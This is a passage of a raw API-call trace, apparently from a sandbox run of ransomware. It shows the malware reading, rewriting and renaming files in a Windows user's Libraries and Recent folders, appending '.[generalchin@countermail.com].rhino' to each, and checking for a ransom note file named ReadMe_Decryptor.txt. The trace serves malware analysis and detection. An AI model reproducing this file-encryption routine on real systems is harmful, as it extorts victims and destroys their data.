HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.265] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0090.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.266] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0090.266] WriteFile (in: hFile=0x104, lpBuffer=0x7609a0*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x7609a0*, lpNumberOfBytesWritten=0x2cfa04*=0xf20, lpOverlapped=0x0) returned 1 [0090.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0090.266] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf20, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.266] CloseHandle (hObject=0x104) returned 1 [0090.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0090.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f208 [0090.268] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.268] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0090.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.270] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf43, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.270] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.270] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.271] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.271] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe23, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe23, lpOverlapped=0x0) returned 1 [0090.272] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.272] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.272] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.272] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.272] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf43, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.272] CloseHandle (hObject=0x104) returned 1 [0090.273] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0f20 [0090.273] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f208 [0090.273] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.275] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.275] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.275] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.275] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.275] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe0e [0090.275] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf2e, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.275] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.275] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.277] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.277] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe0e, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe0e, lpOverlapped=0x0) returned 1 [0090.277] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.277] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.277] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.277] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.277] GetLastError () returned 0x0 [0090.277] SetLastError (dwErrCode=0x0) [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0e) returned 0x23b0198 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.278] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.278] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0090.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0090.279] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0090.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0090.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0090.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0090.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0090.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0090.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0090.281] WriteFile (in: hFile=0x104, lpBuffer=0x7609a0*, nNumberOfBytesToWrite=0xf2e, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x7609a0*, lpNumberOfBytesWritten=0x2cfa04*=0xf2e, lpOverlapped=0x0) returned 1 [0090.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0090.281] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf2e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.281] CloseHandle (hObject=0x104) returned 1 [0090.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0090.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f208 [0090.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.282] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.285] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.285] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.285] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.286] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x16c96 [0090.286] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16db6, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.286] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.286] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.288] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x16c96, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x16c96, lpOverlapped=0x0) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.289] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.289] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.289] GetLastError () returned 0x0 [0090.290] SetLastError (dwErrCode=0x0) [0090.290] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.290] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16cb9) returned 0x70a650 [0090.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0090.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01f8 [0090.293] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.293] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.294] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x6d0000, 